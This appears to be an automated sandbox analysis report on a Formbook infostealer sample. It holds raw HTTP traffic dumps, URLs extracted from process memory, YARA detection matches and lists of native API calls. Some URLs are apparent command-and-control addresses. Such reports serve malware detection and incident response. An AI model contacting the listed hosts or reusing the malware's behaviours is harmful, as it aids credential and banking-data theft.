83 d8 6d c4 f6 1e ca 42 ed d5 86 90 1e c5 79 b0 cf 34 18 2d c1 13 f3 47 6c 68 71 47 ad ff e7 f5 ae 1f fa b0 e1 fa 6b fc a5 ce b6 17 e7 ba 2c b8 e5 45 f0 9f a8 ed fd b6 d8 29 d8 f3 fb 72 bf 57 9b 52 15 aa dc 04 21 4d e5 2a 2a 78 d4 ce e6 a9 1d c6 87 52 d2 85 62 73 27 fc f9 df 7f fe ff bf 7f ff 49 70 fe 
4a 0a 40 e6 29 11 25 77 75 7e e8 48 41 5e 15 cf c6 40 13 24 45 0c 15 79 23 8c 31 ff 9d a1 bb f4 bd 45 7e 9b 64 da e9 92 db 7c b1 5e 08 16 f9 9f 4b 0f 9d 7b d2 3f 43 8c da b6 21 a9 93 29 6d 78 80 5f bd 49 ab eb 08 a1 3a e5 a7 3c d0 0b 75 be 3d fd 84 cd db 29 17 ce c3 29 47 f0 19 4f 79 b1 a3 8c 6e 4e f9 a1 1c 0f e5 29 4f 71 0a 63 4c ab 74 b1 33 4b 01 a7 e1 a5 c5 79 2f bc b4 27 7d 78 69 3f bd 5e 0c 2f 83 b9 c1 0b 48 ab 29 15 ce 0a 1e 49 61 68 86 03 2d 04 9f 9f f2 4b 4f b2 5d a7 53 fe 14 14 91 2b 7a 24 1e 0c f0 00 b4 d3 36 fe f5 be a7 7b 5a a6 f3 7c 5c e4 b7 37 3d a5 2c 4d 69 03 89 0e 09 1f a2 23 3d 72 b8 07 99 dc e6 8b 9b 0c 67 24 8d 2d 9a 5e b8 4f 1c 0e 18 8e 19 91 f7 44 64 80 a6 e8 af fa 76 b1 9e 7a 13 f5 f7 0b 84 18 2a c0 b2 9b 54 49 48 b7 10 1d 7c f2 47 f8 5e 65 68 3e 06 08 41 3b fb 73 74 9e b7 40 03 c4 2f 23 74 99 c3 5f fd fc fd 77 34 44 af 6d ab d5 35 8b 08 cd a2 90 dd 34 cf 24 2c b7 cf 00 47 6c d1 04 b4 4f f8 29 fc 04 22 Data Ascii: c17`2?}Mgl_"9 $jTAXk'%zu_k\,
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <http://sppsuperplast.online/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: brvary: Accept-Encodingdate: Mon, 07 Oct 2024 13:55:47 GMTserver: LiteSpeedData Raw: 63 31 37 0d 0a 60 32 02 80 fc 3f 7d ad af c7 4d a5 c8 67 6c 91 01 84 e4 5f 22 8f f6 f3 fb c5 39 ef 20 b8 c8 24 08 f4 00 c5 f2 6a 54 d5 af a8 b7 e8 f7 fd df b4 f6 fc 41 b7 e6 58 6b e7 27 11 c9 25 b4 7a 75 0b a5 5f 6b 93 99 5c c8 ee f5 da 2c c5 21 d1 57 bb a2 2a 94 c2 a1 2c 0e 84 73 2c 87 d6 cd f9 4f 44 8c 10 f4 4a ab 44 08 70 ff de e2 ed 39 76 66 f4 aa a6 3a 8d de d4 11 1a c7 a5 b6 2d 09 3a 42 62 1d 79 0a bf 7d 90 f7 c0 e8 5f 9c b9 0f 10 eb 34 46 c8 1d 50 b9 de 3b a5 0d 54 bf ee 46 db f5 2d 75 be cd 47 65 f3 a2 30 59 31 6d db 86 8b e7 a3 6d e8 fb 19 f4 4f b6 37 3c 44 ea ac d1 16 f2 b1 33 be 17 b4 3f f7 a8 8c 8b 57 6f c3 fc f6 cd df 9b 8c be b3 73 ec 0c 9a ce b1 33 d4 71 15 f9 8e 77 90 d4 89 22 17 5f ee e5 a7 c6 b9 33 3b 35 39 5e 3f 85 35 9a 51 26 9d 18 3a b0 91 fe 13 c1 a7 66 e0 06 b2 1f 69 7c 88 c5 db a8 a3 81 f7 7e e6 57 c5 93 66 30 83 e5 1d 97 ff fe 93 ac 96 77 65 51 1c 93 9f e9 c7 7a 61 93 b7 79 d5 b1 f6 ae 71 31 ac 7f ce d1 d3 ba e3 23 d1 1d 6f 81 cc 51 3e 2e 5c aa 45 71 8c 68 9d 84 3c cb a7 52 6a 5c 4c 67 60 6f 56 87 7a 18 9c cc 63 df 39 09 82 1b a8 3d 1e 3b e5 59 4b 1b c8 12 e8 eb a3 38 af 9f 41 58 df 80 06 cc 34 d1 a4 e2 00 7b 70 e9 09 9d 6c 02 b0 35 65 78 0c ae 83 9c 87 00 31 e4 4f ca ff b5 e9 53 78 ff 05 7c dd c0 76 bb db 83 d8 6d c4 f6 1e ca 42 ed d5 86 90 1e c5 79 b0 cf 34 18 2d c1 13 f3 47 6c 68 71 47 ad ff e7 f5 ae 1f fa b0 e1 fa 6b fc a5 ce b6 17 e7 ba 2c b8 e5 45 f0 9f a8 ed fd b6 d8 29 d8 f3 fb 72 bf 57 9b 52 15 aa dc 04 21 4d e5 2a 2a 78 d4 ce e6 a9 1d c6 87 52 d2 85 62 73 27 fc f9 df 7f fe ff bf 7f ff 49 70 fe 
4a 0a 40 e6 29 11 25 77 75 7e e8 48 41 5e 15 cf c6 40 13 24 45 0c 15 79 23 8c 31 ff 9d a1 bb f4 bd 45 7e 9b 64 da e9 92 db 7c b1 5e 08 16 f9 9f 4b 0f 9d 7b d2 3f 43 8c da b6 21 a9 93 29 6d 78 80 5f bd 49 ab eb 08 a1 3a e5 a7 3c d0 0b 75 be 3d fd 84 cd db 29 17 ce c3 29 47 f0 19 4f 79 b1 a3 8c 6e 4e f9 a1 1c 0f e5 29 4f 71 0a 63 4c ab 74 b1 33 4b 01 a7 e1 a5 c5 79 2f bc b4 27 7d 78 69 3f bd 5e 0c 2f 83 b9 c1 0b 48 ab 29 15 ce 0a 1e 49 61 68 86 03 2d 04 9f 9f f2 4b 4f b2 5d a7 53 fe 14 14 91 2b 7a 24 1e 0c f0 00 b4 d3 36 fe f5 be a7 7b 5a a6 f3 7c 5c e4 b7 37 3d a5 2c 4d 69 03 89 0e 09 1f a2 23 3d 72 b8 07 99 dc e6 8b 9b 0c 67 24 8d 2d 9a 5e b8 4f 1c 0e 18 8e 19 91 f7 44 64 80 a6 e8 af fa 76 b1 9e 7a 13 f5 f7 0b 84 18 2a c0 b2 9b 54 49 48 b7 10 1d 7c f2 47 f8 5e 65 68 3e 06 08 41 3b fb 73 74 9e b7 40 03 c4 2f 23 74 99 c3 5f fd fc fd 77 34 44 af 6d ab d5 35 8b 08 cd a2 90 dd 34 cf 24 2c b7 cf 00 47 6c d1 04 b4 4f f8 29 fc 04 22 Data Ascii: c17`2?}Mgl_"9 $jTAXk'%zu_k\,
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:56:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:56:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:56:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:56:17 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 07 Oct 2024 13:56:20 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:40 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:42 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:45 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Mon, 07 Oct 2024 13:56:48 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffvary: User-Agent
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 07 Oct 2024 13:57:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Mon, 07 Oct 2024 13:57:38 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: replace.exe, 00000004.00000002.3172177851.0000000003948000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000033B8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://sppsuperplast.online/becc/?EjLdUJJ=NMCgl399tF1pJwA6An/WBP0ajP560ZE7ZZq
            Source: GmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.les-massage.online
            Source: GmuPchEfAM.exe, 00000008.00000002.3172358807.0000000005136000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.les-massage.online/74ou/
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdn.jsdelivr.net/npm/bootstrap-icons
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://code.jquery.com/jquery-3.4.1.min.js
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css2?family=Heebo:wght
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com
            Source: replace.exe, 00000004.00000002.3172177851.0000000003C6C000.00000004.10000000.00040000.00000000.sdmp, GmuPchEfAM.exe, 00000008.00000002.3170349737.00000000036DC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://htmlcodex.com/credit-removal
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.c
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: replace.exe, 00000004.00000003.1669081673.00000000073CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: replace.exe, 00000004.00000002.3167953756.0000000000600000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: replace.exe, 00000004.00000002.3174067922.00000000073EB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C473 NtClose,2_2_0042C473
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B735C0 NtCreateMutant,LdrInitializeThunk,2_2_03B735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B60 NtClose,LdrInitializeThunk,2_2_03B72B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03B72DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03B72C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74340 NtSetContextThread,2_2_03B74340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73090 NtSetValueKey,2_2_03B73090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73010 NtOpenDirectoryObject,2_2_03B73010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B74650 NtSuspendThread,2_2_03B74650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BA0 NtEnumerateValueKey,2_2_03B72BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72B80 NtQueryInformationFile,2_2_03B72B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BF0 NtAllocateVirtualMemory,2_2_03B72BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72BE0 NtQueryValueKey,2_2_03B72BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AB0 NtWaitForSingleObject,2_2_03B72AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AF0 NtWriteFile,2_2_03B72AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72AD0 NtReadFile,2_2_03B72AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B739B0 NtGetContextThread,2_2_03B739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FB0 NtResumeThread,2_2_03B72FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FA0 NtQuerySection,2_2_03B72FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F90 NtProtectVirtualMemory,2_2_03B72F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72FE0 NtCreateFile,2_2_03B72FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F30 NtCreateSection,2_2_03B72F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72F60 NtCreateProcessEx,2_2_03B72F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EA0 NtAdjustPrivilegesToken,2_2_03B72EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E80 NtReadVirtualMemory,2_2_03B72E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72EE0 NtQueueApcThread,2_2_03B72EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72E30 NtWriteVirtualMemory,2_2_03B72E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DB0 NtEnumerateKey,2_2_03B72DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72DD0 NtDelayExecution,2_2_03B72DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D30 NtUnmapViewOfSection,2_2_03B72D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D10 NtMapViewOfSection,2_2_03B72D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D10 NtOpenProcessToken,2_2_03B73D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72D00 NtSetInformationFile,2_2_03B72D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B73D70 NtOpenThread,2_2_03B73D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CA0 NtQueryInformationToken,2_2_03B72CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CF0 NtOpenProcess,2_2_03B72CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72CC0 NtQueryVirtualMemory,2_2_03B72CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C00 NtQueryInformationProcess,2_2_03B72C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B72C60 NtCreateKey,2_2_03B72C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C84340 NtSetContextThread,LdrInitializeThunk,4_2_02C84340
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C84650 NtSuspendThread,LdrInitializeThunk,4_2_02C84650
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C835C0 NtCreateMutant,LdrInitializeThunk,4_2_02C835C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AD0 NtReadFile,LdrInitializeThunk,4_2_02C82AD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AF0 NtWriteFile,LdrInitializeThunk,4_2_02C82AF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BE0 NtQueryValueKey,LdrInitializeThunk,4_2_02C82BE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_02C82BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_02C82BA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82B60 NtClose,LdrInitializeThunk,4_2_02C82B60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C839B0 NtGetContextThread,LdrInitializeThunk,4_2_02C839B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82EE0 NtQueueApcThread,LdrInitializeThunk,4_2_02C82EE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_02C82E80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FE0 NtCreateFile,LdrInitializeThunk,4_2_02C82FE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FB0 NtResumeThread,LdrInitializeThunk,4_2_02C82FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F30 NtCreateSection,LdrInitializeThunk,4_2_02C82F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_02C82CA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C60 NtCreateKey,LdrInitializeThunk,4_2_02C82C60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_02C82C70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DD0 NtDelayExecution,LdrInitializeThunk,4_2_02C82DD0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_02C82DF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D10 NtMapViewOfSection,LdrInitializeThunk,4_2_02C82D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_02C82D30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83090 NtSetValueKey,4_2_02C83090
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83010 NtOpenDirectoryObject,4_2_02C83010
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82AB0 NtWaitForSingleObject,4_2_02C82AB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82B80 NtQueryInformationFile,4_2_02C82B80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82EA0 NtAdjustPrivilegesToken,4_2_02C82EA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82E30 NtWriteVirtualMemory,4_2_02C82E30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F90 NtProtectVirtualMemory,4_2_02C82F90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82FA0 NtQuerySection,4_2_02C82FA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82F60 NtCreateProcessEx,4_2_02C82F60
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CC0 NtQueryVirtualMemory,4_2_02C82CC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82CF0 NtOpenProcess,4_2_02C82CF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82C00 NtQueryInformationProcess,4_2_02C82C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82DB0 NtEnumerateKey,4_2_02C82DB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83D70 NtOpenThread,4_2_02C83D70
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C82D00 NtSetInformationFile,4_2_02C82D00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C83D10 NtOpenProcessToken,4_2_02C83D10
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00159120 NtAllocateVirtualMemory,4_2_00159120
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158CE0 NtCreateFile,4_2_00158CE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00158E40 NtReadFile,4_2_00158E40
